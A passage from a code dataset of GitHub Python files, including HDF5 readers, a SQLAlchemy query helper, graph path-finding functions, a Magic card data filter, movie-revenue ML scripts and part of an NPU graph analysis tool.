> 0):\n\t\tprint(\"Sinks read. Making sink arrays.\")\n\t\ta.idsink = np.linspace(0,nsink-1,nsink,dtype='int32') + ngas\n\t\ta.sinkx = a.x[a.idsink]\n\t\ta.sinky = a.y[a.idsink]\n\t\ta.sinkz = a.z[a.idsink]\n\t\ta.sinkvx = a.vx[a.idsink]\n\t\ta.sinkvy = a.vy[a.idsink]\n\t\ta.sinkvz = a.vz[a.idsink]\n\t\ta.sinkmass = a.mass[a.idsink]\n\t\ta.sinkid = a.partid[a.idsink]\n\n\ti_not_gas = [1, 2, 3, 5] # type 4 is reservered for TRACER_MC\n\tif(sum(npart[i_not_gas]) > 0):\n\t\tigas = np.linspace(0,ngas-1,ngas,dtype='int32')\n\t\ta.x = a.x[igas]\n\t\ta.y = a.y[igas]\n\t\ta.z = a.z[igas]\n\t\ta.vx = a.vx[igas]\n\t\ta.vy = a.vy[igas]\n\t\ta.vz = a.vz[igas]\n\t\ta.partid = a.partid[igas]\n\t\ta.mass = a.mass[igas]\n\t\tif (igot_pot == 1):\n\t\t\ta.potential = a.potential[igas]\n\t\tif (igot_accel == 1):\n\t\t\ta.accel = a.accel[igas, :]\n\t\tif (igot_dt == 1):\n\t\t\ta.dt = a.dt[igas]\n\t\tif (igot_soft == 1):\n\t\t\ta.softening= a.softening[igas]\n\n\t# if we have chemistry, then we need to provide the temperature\n\tif (igot_chem > 0):\n\t\tprint('Creating an array with T [K] from specific energies')\n\t\tABHE = 0.1\n\t\tuenergy = 2.64481e+42\n\t\tulength = 1e17\n\t\tudensity = 1.991e-18\n\t\tyn = a.rho*udensity / ((1.0 + 4.0 * ABHE) * mp)\n\t\tenergy = a.u * a.rho * uenergy / ulength**3\n\t\tyntot = (1.0 + ABHE - a.chem[:, 0] + a.chem[:, 1]) * yn\n\t\ta.temp = 2.0 * energy / (3.0 * yntot * k_B)\n\n\t# get radius from densest point, com, or first sink\n\tif (a.nsink > 0):\n\t\ta.rad = np.sqrt((a.x - a.sinkx[0])**2 + (a.y - a.sinky[0])**2 + (a.z - a.sinkz[0])**2)\n\n\n\tif(igot_bmag > 0):\n\t\ta.l = (a.mass / a.rho)**(1./3.)\n\t\ta.bmag = np.sqrt(a.bx**2 + a.by[:,1]**2 + a.bz[:,2]**2)\t\n\n\treturn a \n\n\n\n\n\n\n","repo_name":"lewisprole/Pop3_Bfield","sub_path":"lewis_arepo_code/hdf5_read.py","file_name":"hdf5_read.py","file_ext":"py","file_size_in_byte":4056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24455527452","text":"from contextlib import closing\nimport socket\nimport subprocess\n\nDEFAULT_PORT=7364\n\nclass PlumtunaServer(object):\n def __init__(self, bind_addr=None, bind_port=None, contact_host=None, contact_port=None):\n http_port = find_free_port()\n if contact_host is None:\n rpc_addr, rpc_port = find_rpc_server_addr_and_port(bind_addr, bind_port)\n else:\n contact_port = contact_port or DEFAULT_PORT\n rpc_addr, rpc_port = find_rpc_client_addr_and_port(bind_addr, bind_port, contact_host, contact_port)\n\n args = [\"plumtuna\",\n \"--http-port\", str(http_port),\n \"--rpc-addr\", \"{}:{}\".format(rpc_addr, rpc_port),\n \"--exit-if-stdin-close\"]\n if contact_host is not None:\n args.extend([\"--contact-server\", \"{}:{}\".format(contact_host, contact_port)])\n\n self._process = subprocess.Popen(args, stdin=subprocess.PIPE)\n assert self._process is not None\n\n self.http_port = http_port\n self.rpc_addr = rpc_addr\n self.rpc_port = rpc_port\n\n def __del__(self):\n if self._process is not None:\n try:\n self._process.kill()\n except AttributeError:\n pass\n\n\ndef find_rpc_client_addr_and_port(addr=None, port=None, contact_host=None, contact_port=None):\n if addr is None or port is None:\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.connect((contact_host, contact_port))\n local_addr, local_port = client.getsockname()\n if addr is None:\n addr = local_addr\n if port is None:\n port = local_port\n return (addr, port)\n\ndef find_rpc_server_addr_and_port(addr=None, port=None):\n port = port or find_free_port()\n if addr is None:\n addr = socket.gethostbyname(socket.gethostname())\n else:\n addr = socket.gethostbyname(addr)\n return (addr, port)\n\ndef find_free_port():\n with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:\n s.bind(('', 0))\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n return s.getsockname()[1]\n\ndef find_local_addr(peer):\n client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client.connect((peer_host, peer_port))\n","repo_name":"sile/plumtuna.py","sub_path":"plumtuna/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"16968541827","text":"\ndef solution(s):\n \n result = []\n zero = num = cnt = 0\n while len(s) != 1:\n\n zero = s.count('0')\n s = s.replace('0', '')\n s = format(len(s), 'b')\n\n cnt += zero\n num += 1\n\n result.append(num)\n result.append(cnt)\n\n return result\n ","repo_name":"wdahlia/Python-Algorithm","sub_path":"프로그래머스/PG_이진변환반복.py","file_name":"PG_이진변환반복.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"1328023891","text":"#!/usr/local/bin/python3\n\nimport h5py\nimport argparse\nimport numpy as np\nimport sys\n\ndef main():\n parser = argparse.ArgumentParser(description=\"dump hdf5 to txt\", usage=\"h5parse [-h] file datasets[:col,col,col] [datasets ...] [-o OUTPUT]\")\n parser.add_argument('file', type=str, help=\"hdf5 archive\")\n parser.add_argument('datasets', type=str, nargs=\"+\", help=\"datasets from hdf5 to dump to txt\")\n parser.add_argument('-o', \"--output\", type=str, help=\"output file\")\n args = parser.parse_args()\n\n try:\n f = h5py.File(args.file, \"r\")\n except OSError:\n print(\"error: file %s does not exist\" % args.file)\n return 1\n\n n = len(args.datasets)\n data = [0]*n\n\n for i in range(n):\n arg_in = args.datasets[i].split(\":\")\n datapath = arg_in[0]\n try:\n load_data = f[datapath].value\n except KeyError:\n print(\"error: dataset %s does not exist\" % datapath)\n return 1\n\n if len(arg_in) == 1:\n data[i] = load_data\n elif len(arg_in) == 2:\n cols = [int(i) for i in arg_in[1].split(\",\")]\n if all(c < load_data.shape[1] for c in cols):\n data[i] = load_data[:, cols]\n else:\n print(\"error: column out of bounds in dataset %s\" % datapath)\n return 1\n \n\n nrows = data[0].shape[0]\n ncols = 0\n for i in range(n):\n if len(data[i].shape) > 1:\n ncols += data[i].shape[1]\n else:\n ncols += 1\n\n if data[i].shape[0] != nrows:\n print(\"error datasets have incompatible shapes\")\n return 0\n\n out = np.zeros((nrows, ncols))\n col = 0\n for i in range(n):\n if len(data[i].shape) > 1:\n for j in range(data[i].shape[1]):\n out[:, col] = data[i][:,j]\n col += 1\n else:\n out[:, col] = data[i]\n col += 1\n\n\n if (args.output):\n np.savetxt(args.output, out)\n else:\n np.savetxt(sys.stdout.buffer, out)\n\n return 0\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CQMP/scripts","sub_path":"h5parse/h5parse.py","file_name":"h5parse.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2222801110","text":"import ast\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport sys\n\nfrom test_functions import *\nfrom preprocessing import *\nfrom utils import *\nfrom naive_bayes import *\nfrom svm_classifier import *\nfrom decision_regression_trees import *\nfrom instance_based import *\nfrom features_improement import *\n\ndef test_algorithms(movies_metadata_dataframe, credits_dataframe):\n \"\"\" Tests several (decision tree) algorithms usign some dataframes \"\"\"\n # Creates testing dataframe\n df = create_trees_testing_dataframe(movies_metadata_dataframe, credits_dataframe)\n\n # Tests decision tree or gradient boosting classification\n print(\"Predicting the success of the movies using classification ...\")\n X = df.drop(columns=\"is_successful\")\n y = df[\"is_successful\"]\n\n test_decision_tree_classification_with_cv(X, y)\n test_gradient_boosting_classification_with_cv(X, y)\n test_knn_classification_with_cv(X, y)\n\n X_train, X_test, y_train, y_test = train_test_split(X, y,\n test_size=0.33,\n random_state=42)\n\n test_gradient_boosting_classification(X_train, X_test, y_train, y_test)\n test_decision_tree_classification(X_train, X_test, y_train, y_test)\n\n # Tests regression tree, liear regression and boosting\n print(\"\\nPredicting revenue using regression ...\")\n print(\" The shape of the dataframe before filtering is: \", df.shape)\n df[\"revenue\"] = movies_metadata_dataframe[\"revenue\"]\n print(\" The revenue values equal to 0 are: \", df[df[\"revenue\"] == 0.0][\"revenue\"].count())\n print(\" Replacing the revenue's 0 values with NaN ...\")\n df[\"revenue\"].replace(0.0, np.nan, inplace=True)\n print(\" The revenue values that are NaN are: \", df[df['revenue'].isnull()].shape)\n print(\" Filtering the datafram by the revenue values that are not NaN ...\")\n df = df[df['revenue'].notnull()]\n print(\" The shape of the dataframe after filtering is: \", df.shape)\n show_columns_with_nan(df)\n #X_train, X_test, y_train, y_test = train_test_split(df.drop(columns=\"revenue\"),\n # df[\"revenue\"],\n # test_size=0.33,\n # random_state=42)\n X = df.drop(columns=\"revenue\")\n y = df[\"revenue\"]\n test_linear_regression_with_cv(X, y)\n test_decision_tree_regression_with_cv(X, y)\n test_gradient_boosting_regression_with_cv(X, y)\n test_knn_regression_with_cv(X, y)\n\n\ndef main():\n movies_metadata_test_file_path = \"movies_metadata_test.csv\"\n movies_metadata_file_path = \"files/the-movies-dataset/movies_metadata.csv\"\n credits_file_path = \"files/the-movies-dataset/credits.csv\"\n ratings_file_path = \"files/the-movies-dataset/ratings_small.csv\"\n imdb_movies_file_path = \"files/imdb/imdb.csv\"\n\n print(\"Reading movies data ...\")\n\n # Reads the movies metadata data\n print(\" Reading the movies' metadata ...\")\n movies_metadata_dataframe = read_data(movies_metadata_file_path)\n\n # Reads the ratings data\n print(\" Reading the movies' ratings ...\")\n ratings_dataframe = read_data(ratings_file_path)\n\n # Reads the credits data\n print(\" Reading the movies' credits ...\")\n credits_dataframe = read_data(credits_file_path)\n\n # Reads the imdb movies data\n #print(\" Reading the imdb movies data ...\")\n #imdb_movies_dataframe = read_data(imdb_movies_file_path)\n\n # Adds the the imdb movies data to the imds_movies_dataframe\n #movies_metadata_dataframe = add_new_columns_from_imdb_movies_dataframe(imdb_movies_dataframe,\n # movies_metadata_dataframe)\n\n # Preprocesses the movies' metadata\n movies_metadata_dataframe = preprocess_movies_metadata(movies_metadata_dataframe, False)\n\n # Preprocesses the movies' credits\n credits_dataframe = preprocess_movies_credits(credits_dataframe)\n\n # Tests algorithms with some data\n test_algorithms(movies_metadata_dataframe, credits_dataframe)\n naive_bayes(movies_metadata_dataframe, credits_dataframe)\n test_svm(movies_metadata_dataframe, credits_dataframe)\n\n\nif __name__ == \"__main__\":\n # Enables the unicode console encoding on Windows\n if sys.platform == \"win32\":\n enable_win_unicode_console()\n main()\n","repo_name":"hristy93/Attis","sub_path":"MoviesApp.py","file_name":"MoviesApp.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39792398366","text":"__title__ = 'readtime'\n__description__ = 'Calculates the time some text takes the average human to ' \\\n 'read, based on Medium\\'s read time formula'\n__url__ = 'https://github.com/alanhamlett/readtime'\n__version_info__ = ('3', '0', '0')\n__version__ = '.'.join(__version_info__)\n__author__ = 'Alan Hamlett'\n__author_email__ = 'alan.hamlett@gmail.com'\n__license__ = 'BSD'\n__copyright__ = 'Copyright 2016 Alan Hamlett'\n","repo_name":"alanhamlett/readtime","sub_path":"readtime/__about__.py","file_name":"__about__.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"21"} +{"seq_id":"29411712578","text":"from django.contrib import admin\nfrom untitled4 import settings\n# Register your models here.\nbase_dir = settings.BASE_DIR\norigin_path = base_dir + '/media'\nbase_path = base_dir+ '/advertisement/resources'\ntemp_path = base_path + '/temp_path'\njpg_path = temp_path + '/jpg_path'\ntext_path = temp_path + '/text_path'\ndarkflow_path = base_path + '/darkflow'\nmodel_path = base_path + '/darkflow/cfg/tiny-yolo-1c.cfg'","repo_name":"Subham2111/brand-exposure","sub_path":"advertisement/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19600182451","text":"from sqlalchemy import Column, and_, create_engine\nfrom sqlalchemy.orm import declarative_base, sessionmaker\n\n\nclass SqlOperator:\n def __init__(self, db_type, connection_string: str):\n self.engine = create_engine(connection_string)\n self.Session = sessionmaker(bind=self.engine)\n self.Base = declarative_base()\n\n def create_table(self, table_name: str, columns: str, keycolumn: str):\n try:\n \"\"\"Create table dynamically\"\"\"\n columns_def = {}\n for col_name, col_type in columns.items():\n if col_name == keycolumn:\n columns_def[col_name] = Column(col_type, primary_key=True)\n else:\n columns_def[col_name] = Column(col_type)\n table = type(\n table_name, (self.Base,), {\"__tablename__\": table_name, **columns_def}\n )\n if not hasattr(self.Base, table_name):\n setattr(self.Base, table_name, table)\n table.__table__.create(bind=self.engine)\n except Exception:\n raise Exception(\"create exception\")\n\n \"\"\" Count \"\"\"\n\n def count(self, table_name: str, criteria: dict = None):\n try:\n session = self.Session()\n findresult = self.search_generate(session, table_name, criteria)\n return len(findresult)\n except Exception:\n raise Exception(\"count exception\")\n\n \"\"\" Find \"\"\"\n\n def find(self, table_name: str, criteria: dict):\n try:\n session = self.Session()\n findresult = self.search_generate(session, table_name, criteria)\n results = []\n for obj in findresult:\n row = {}\n for col in obj.__table__.columns:\n row[col.name] = getattr(obj, col.name)\n results.append(row)\n return results\n except Exception:\n raise Exception(\"find exception\")\n\n def search_generate(self, session: object, table_name: str, criteria: dict):\n try:\n table = getattr(self.Base, table_name)\n query = session.query(table)\n conditions = []\n # Multiple\n if \"$and\" in criteria.keys():\n and_conditions = []\n for cond in criteria[\"$and\"]:\n cond_conditions = self.generate_conditions(table, cond)\n if cond_conditions:\n and_conditions.append(and_(*cond_conditions))\n if and_conditions:\n query = query.filter(and_(*and_conditions))\n else:\n conditions = self.generate_conditions(table, criteria)\n if conditions:\n query = query.filter(*conditions)\n return query.all()\n except Exception:\n raise Exception(\"search genarate exception\")\n\n def generate_conditions(self, table, criteria):\n try:\n conditions = []\n for key, value in criteria.items():\n column = getattr(table, key)\n if not isinstance(value, dict):\n condition = column == value\n elif \"$ne\" in value.keys():\n condition = column != value[\"$ne\"]\n elif \"$gt\" in value.keys():\n condition = column > value[\"$gt\"]\n elif \"$lt\" in value.keys():\n condition = column < value[\"$lt\"]\n elif \"$gte\" in value.keys():\n condition = column >= value[\"$gte\"]\n elif \"$lte\" in value.keys():\n condition = column <= value[\"$lte\"]\n elif \"$regex\" in value.keys():\n likesentence = self.convert_regexp_to_like(value[\"$regex\"])\n condition = column.like(likesentence)\n else:\n condition = None\n if condition is not None:\n conditions.append(condition)\n return conditions\n except Exception:\n raise Exception(\"generate condition exception\")\n\n def convert_regexp_to_like(self, regexp_pattern):\n try:\n # Convert regular expression patterns to LIKE\n like_pattern = regexp_pattern.replace(\".\", \"\")\n if like_pattern.startswith(\"^\") and like_pattern.endswith(\"$\"):\n like_pattern = like_pattern.replace(\"^\", \"\")\n like_pattern = like_pattern.replace(\"$\", \"%\")\n like_pattern = like_pattern.replace(\"*\", \"%\")\n like_pattern = like_pattern.replace(\"%%\", \"%\")\n else:\n like_pattern = like_pattern.replace(\"^\", \"\") + \"%%%%\"\n return like_pattern\n except Exception:\n raise Exception(\"convert regexp exception\")\n\n \"\"\" Insert \"\"\"\n\n def insert(self, table_name: str, data: dict):\n try:\n session = self.Session()\n table = getattr(self.Base, table_name)\n obj = table(**data)\n session.add(obj)\n session.commit()\n except Exception:\n raise Exception(\"insert exception\")\n\n \"\"\" Update \"\"\"\n\n def update(self, table_name: str, criteria: dict, updates: dict):\n try:\n session = self.Session()\n findresults = self.search_generate(session, table_name, criteria)\n if findresults:\n for findresult in findresults:\n for key, value in updates[\"$set\"].items():\n setattr(findresult, key, value)\n session.commit()\n except Exception:\n raise Exception(\"update exception\")\n\n \"\"\" Delete \"\"\"\n\n def delete(self, table_name: str, criteria: dict):\n try:\n session = self.Session()\n findresults = self.search_generate(session, table_name, criteria)\n\n if findresults:\n for findresult in findresults:\n session.delete(findresult)\n session.commit()\n except Exception:\n raise Exception(\"delete exception\")\n\n\n\"\"\" Connection \"\"\"\n\"\"\"\n# sqlite\nfrom libs.databases.sqloperate import SQLiteDatabase\ndb = SQLiteDatabase('sqlite:///test.db')\ndb = SQLiteDatabase('sqlite:///:memory:')\n\n# MySQL\nfrom libs.databases.sqloperate import MySQLDatabase\ndb = MySQLDatabase('mysql+pymysql://user:password@hostname/dbname')\n\n# PostgreSQL\nfrom libs.databases.sqloperate import PostgreSQLDatabase\ndb = PostgreSQLDatabase('postgresql+psycopg2://user:password@hostname/dbname')\n\n\"\"\"\n\n\nclass MySQLDatabase(SqlOperator):\n def __init__(self, connection_string):\n super().__init__(\"mysql\", connection_string)\n\n\nclass PostgreSQLDatabase(SqlOperator):\n def __init__(self, connection_string):\n super().__init__(\"postgresql\", connection_string)\n\n\nclass SQLiteDatabase(SqlOperator):\n def __init__(self, connection_string):\n super().__init__(\"sqlite\", connection_string)\n","repo_name":"Otazoman/uhiimanbot","sub_path":"libs/databases/sqloperate.py","file_name":"sqloperate.py","file_ext":"py","file_size_in_byte":6992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70537830132","text":"import pandas as pd\nimport datetime as dt\nimport re\n\nscryData = pd.read_csv('2020_09_25_data/card_data.csv')\n\n\n#######\n# feature filtering\n#######\n\n# layouts to filter out\n### transform might be interesting!!!\nfilter_layout_lst = ['art_series', 'augment', 'double_faced_token', 'emblem',\n 'host', 'planar', 'scheme', 'token', 'vanguard']\nscryData = scryData[~scryData['layout'].isin(filter_layout_lst)]\n\n# filter corrupted \nfilter_names_lst = ['Shu General', 'Ancient Spider', 'Longbow Archer',\n 'Livonya Silone',\n 'Noxious Hydra Breath', 'Tel-Jilad Archers',\n 'Bayou Dragonfly', 'Zhang Fei, Fierce Warrior',\n 'Lu Bu, Master-at-Arms']\nscryData = scryData[~scryData['names'].isin(filter_names_lst)]\n\n# filter meld cards\nfilter_names_lst = ['Brisela, Voice of Nightmares',\n 'Chittering Host',\n 'Hanweir, the Writhing Township']\nscryData = scryData[~scryData['names'].isin(filter_names_lst)]\n\n# filter universally banned cards\nfilter_names_lst = ['Cleanse', 'Imprison', 'Jihad', 'Crusade',\n 'Invoke Prejudice', 'Pradesh Gypsies',\n 'Stone-Throwing Devils']\nscryData = scryData[~scryData['names'].isin(filter_names_lst)]\n\n# filter by sets\nfilter_set_lst = ['unh', 'ust', 'und', 'ugl', 'tfth', 'htr', 'htr17', 'htr18',\n 'ana', 'tbth', 'pcel', 'tdag', 'prm', 'hho']\nscryData = scryData[~scryData['set_name'].isin(filter_set_lst)]\n\nfilter_settype_lst = ['funny', 'token', 'archenemy', 'planechase']\nscryData = scryData[~scryData['set_type'].isin(filter_settype_lst)]\n\n# filter cards with no price\nscryData = scryData[scryData['price'].notna()]\n\nprint(scryData.info(verbose = True))\nprint(' ')\nprint(scryData.shape)\n\n#######\n# save cleaned dataframe to csv\n#######\n\nscryData.to_csv('2020_09_25_data_processed/filtered_card_data.csv', index=False)\n","repo_name":"PatrickMal3/Magic-Card-Evaluation","sub_path":"pre_filter.py","file_name":"pre_filter.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"46582173654","text":"def main():\n print(\"Qual foi o time campeão da libertadores de 2019?\")\n resultado = input()\n\n if resultado.upper() == 'FLAMENGO':\n print(\"Certa resposta :)\")\n\n else:\n print(\"Errou :(\")\n\n print(\"Obrigado por jogar!\")\n\nif __name__ == '__main__':\n main()\n\n \n","repo_name":"SirLeonardoFerreira/Atividades-ifpi","sub_path":"Desafio quiz/desafio01_quiz.py","file_name":"desafio01_quiz.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2773204877","text":"print(\"I'm running Python code on my own environment!\")\r\n# print(\"a\"-3)\r\n\r\nfruits = [\"apple\", \"bananna\", \"pineapple\", \"mango\"];\r\nprint(fruits[:-1])\r\n\r\nnumber_collection = [[100, 200], [100, 200], [475, 29], [34, 34]]\r\nnum_pairs = number_collection.count([100, 200])\r\n# print how many times [100, 200] appears\r\nprint(num_pairs)\r\n\r\n#Write your function here\r\ndef append_size(my_list):\r\n length = len(my_list)\r\n my_list.append(length)\r\n return my_list\r\n\r\n#Uncomment the line below when your function is done\r\nprint(append_size([23, 42, 108]))\r\n\r\nlist1 = [1,2,3,4,5]\r\nprint(\"list1:\", list1)\r\nlist1 = []\r\ndel list1[:]\r\nprint(\"list1:\", list1)\r\n\r\nfrom typing import List\r\nstr = [\"Jiho\", \"Adam\", \"Sonny\", \"Alisha\"]\r\ngarden_waitlist: List[str];\r\nprint(garden_waitlist)\r\n\r\n","repo_name":"tlockhart/pythone_practice","sub_path":"primitives_part1.py","file_name":"primitives_part1.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31952363691","text":"def find_path(graph, start, end, f_path=[]):\n if f_path is None:\n f_path = []\n f_path = f_path + [start]\n if start == end:\n return f_path\n if start not in graph:\n return None\n for node in graph[start]:\n if node not in f_path:\n f_newpath = find_path(graph, node, end, f_path)\n if f_newpath: return f_newpath\n return None\n\n\ndef find_all_paths(graph, start, end, f_a_path=[]):\n f_a_path = f_a_path + [start]\n if start == end:\n return [f_a_path]\n if start not in graph:\n return []\n paths = []\n for node in graph[start]:\n if node not in f_a_path:\n newpaths = find_all_paths(graph, node, end, f_a_path)\n for newpath in newpaths:\n paths.append(newpath)\n return paths\n\n\ndef find_shortest_path(graph, start, end, shortestLength=-1, f_s_path=[]):\n f_s_path = f_s_path + [start]\n if start == end:\n return f_s_path\n if start not in graph:\n return None\n shortest = None\n for node in graph[start]:\n if node not in f_s_path:\n if shortestLength == -1 or len(f_s_path) < (shortestLength - 1):\n newpath = find_shortest_path(graph, node, end, shortestLength, f_s_path)\n if newpath:\n if not shortest or len(newpath) < len(shortest):\n shortest = newpath\n shortestLength = len(newpath)\n return shortest\n","repo_name":"CaptainMills78/Classwork-Year-1-Term-1---2","sub_path":"Others/Graphs/London tube/Map/Algorithms.py","file_name":"Algorithms.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42082137036","text":"# coding=utf-8\n\"\"\"\nGraph Manager\n\"\"\"\nimport json\nimport os\nimport collections\nimport time\nfrom .op import Op\nfrom ..util.util import util\nfrom ..util.constant import Constant\nfrom ..util.precision_tool_exception import catch_tool_exception\nfrom ..util.precision_tool_exception import PrecisionToolException\nfrom ..config import config as cfg\n\nDANGEROUS_CAST = {\n 'DT_FLOAT': ['DT_INT32']\n}\n\nNO_DIG_OPS = ['AtomicAddrClean', 'NetOutput']\nCKPT_META_SHUFFIX='.meta'\n\nOP_CAST = 'Cast'\n\n\nclass NpuSubGraph(object):\n def __init__(self, graph_json, build_file, npu_graph):\n self.log = util.get_log()\n self.graph_name = graph_json['name']\n self.npu_graph = npu_graph\n self.graph = graph_json\n self.build_file = build_file\n self.ops_list = collections.OrderedDict()\n self.ops_type_list = {}\n self._prepare()\n self.graph_id = self._get_graph_id()\n\n def _prepare(self):\n self.log.debug(\"Graph %s operator count: %d\" % (self.graph_name, len(self.graph['op'])))\n for op_json in self.graph['op']:\n op_name = op_json['name']\n op_type = op_json['type']\n if op_name not in self.ops_list:\n self.ops_list[op_name] = []\n op = Op(op_json, self.ops_list, self.graph['name'], self.npu_graph, self)\n if op_type not in self.ops_type_list:\n self.ops_type_list[op_type] = {}\n self.ops_list[op_name] = op\n self.ops_type_list[op_type][op_name] = op\n\n def _get_graph_id(self):\n if 'attr' in self.graph:\n for item in self.graph['attr']:\n if item['key'] == '_session_graph_id':\n return item['value']['s']\n self.log.warning(\"Unknown sub graph id.\")\n return \"UNKNOWN\"\n\n def compare(self, sub_graph):\n \"\"\"compare with another sub graph\"\"\"\n if not isinstance(sub_graph, NpuSubGraph):\n raise PrecisionToolException(\"Should compare with another subgraph.\")\n right_ops_list = sub_graph.ops_list\n ignore_ops = [\"TransData\", \"Cast\", \"Recv\", \"Send\", \"Variable\", \"NetOutput\", \"NoOp\", \"Assign\", \"Constant\",\n \"StreamActive\"]\n similar_count = 0\n for op_name in self.ops_list:\n if self.ops_list[op_name].type() in ignore_ops:\n continue\n if op_name not in right_ops_list:\n self.log.warning(\"Can not Find [%s] %s in right subgraph.\", self.ops_list[op_name].type(), op_name)\n continue\n result, similar = self.ops_list[op_name].compare(right_ops_list[op_name])\n if not similar:\n util.print_panel(result, title=op_name)\n else:\n similar_count += 1\n for op_name in right_ops_list:\n if right_ops_list[op_name].type() in ignore_ops:\n continue\n if op_name not in self.ops_list:\n self.log.warning(\"Can not Find [%s] %s in left subgraph.\", right_ops_list[op_name].type(), op_name)\n self.log.info(\"Compare [%s] [%s], similarity is [%s / %s]\",\n self.graph_name, sub_graph.graph_name, similar_count, len(self.ops_list))\n\n def get_op(self, name):\n if name in self.ops_list:\n return [self.ops_list[name]]\n guess_op_list = []\n for op_detail in self.ops_list.values():\n if name in op_detail.name() or name == str(op_detail.name()).replace('/', '_'):\n guess_op_list.append(op_detail)\n return guess_op_list\n\n def get_parent_node_by_subgraph_name(self, graph_name):\n ops = []\n for op_detail in self.ops_list.values():\n if graph_name in op_detail.subgraph_names():\n ops.append(op_detail)\n return ops\n\n def get_op_by_type(self, op_type):\n ops = []\n for op_detail in self.ops_list.values():\n if op_type == op_detail.type():\n ops.append(op_detail)\n return ops\n\n def check_cast(self):\n cast_list = {}\n danger_cast_list = {}\n if OP_CAST in self.ops_type_list:\n cast_ops = self.ops_type_list[OP_CAST]\n for op in cast_ops.values():\n input_type = ''\n output_type = ''\n for input_desc in op.inputs():\n input_type = input_desc.dtype() if input_desc.dtype() != '' else input_type\n for output_desc in op.outputs():\n output_type = output_desc.dtype() if output_desc.dtype() != '' else output_type\n cast_type = \"%s -> %s\" % (input_type, output_type)\n if cast_type not in cast_list:\n cast_list[cast_type] = []\n cast_list[cast_type].append(op.name())\n for cast_type in cast_list:\n if self._is_dangerous_cast(cast_type):\n summary_txt = \"[green][Cast][/green][red][%s][/red] %s\" % (cast_type, cast_list[cast_type])\n util.print(summary_txt)\n\n @staticmethod\n def _is_dangerous_cast(cast_type):\n \"\"\"Check if cast \"\"\"\n cast_info = cast_type.split(\" -> \")\n input_dtype = cast_info[0]\n output_dtype = cast_info[1]\n if input_dtype in DANGEROUS_CAST:\n if output_dtype in DANGEROUS_CAST[input_dtype]:\n return True\n return False\n\n\nclass NpuGraph(object):\n def __init__(self, debug_id=Constant.DEFAULT_DEBUG_ID):\n self.log = util.get_log()\n self.build_files = None\n self.build_json_files = []\n self.debug_id = debug_id\n self.npu_root = os.path.join(cfg.NPU_DIR, debug_id)\n self.graph_root = os.path.join(self.npu_root, Constant.GRAPH)\n self.sub_graphs = collections.OrderedDict()\n self.ops_list = []\n util.create_dir(self.graph_root)\n\n @catch_tool_exception\n def prepare(self):\n \"\"\"prepare\"\"\"\n self._prepare_npu_graphs()\n if self.build_files is not None:\n for build_file in self.build_files:\n self._parse_ops(build_file)\n\n def check_cast(self):\n \"\"\"Check cast op type\"\"\"\n for sub_graph in self.sub_graphs.values():\n sub_graph.check_cast()\n\n def check_dtype(self):\n \"\"\"Check op input/output dtype\"\"\"\n for op in self.ops_list:\n input_dtype = ''\n for input_desc in op.inputs():\n input_dtype += ' ' + input_desc.dtype()\n output_dtype = ''\n for output_desc in op.outputs():\n output_dtype += ' ' + output_desc.dtype()\n util.print('[green][%s][/green] %s\\n - Input: %s\\n - Output: %s' % (\n op.type(), op.name(), input_dtype, output_dtype))\n\n def check_similarity(self):\n \"\"\"Check graph similarity.\"\"\"\n\n @catch_tool_exception\n def save_sub_graph(self, op, deep=0, dump_manager=None, compare_manager=None):\n \"\"\"Save sub graph\"\"\"\n if op is None:\n raise PrecisionToolException(\"Save sub graph failed as root operator is None.\")\n try:\n from graphviz import Digraph\n file_name_list = [self.debug_id, op.graph_name, op.type(), op.name().replace('/', '_').replace('.', '_'),\n str(deep), 'gv']\n file_name = '.'.join(file_name_list)\n path = os.path.join(cfg.OP_GRAPH_DIR, file_name)\n dot = Digraph(file_name, filename=path, node_attr={'shape': 'Mrecord'}, format='svg')\n dot_list = []\n edge_list = []\n self._gen_sub_graph(dot, op, deep, dot_list, edge_list, 'red', direction='all',\n dump_manager=dump_manager, compare_manager=compare_manager)\n dot.format = 'svg'\n dot.save(path)\n self.log.info(\"Sub graph saved to %s\" % os.path.abspath(cfg.OP_GRAPH_DIR))\n try:\n dot.view(path)\n time.sleep(1)\n except Exception as err:\n raise PrecisionToolException(\n \"graphviz not install, use [yum/apt-get] install graphviz xdg-utils. %s\" % err)\n except ImportError as err:\n raise PrecisionToolException(\"Save sub graph failed as import graphviz module failed. %s\" % err)\n\n def _gen_sub_graph(self, dot, op, deep, dot_list, edge_list, color='black', direction='all',\n dump_manager=None, compare_manager=None):\n \"\"\"Gen sub graph\"\"\"\n if deep == 0 or op.type() in NO_DIG_OPS:\n 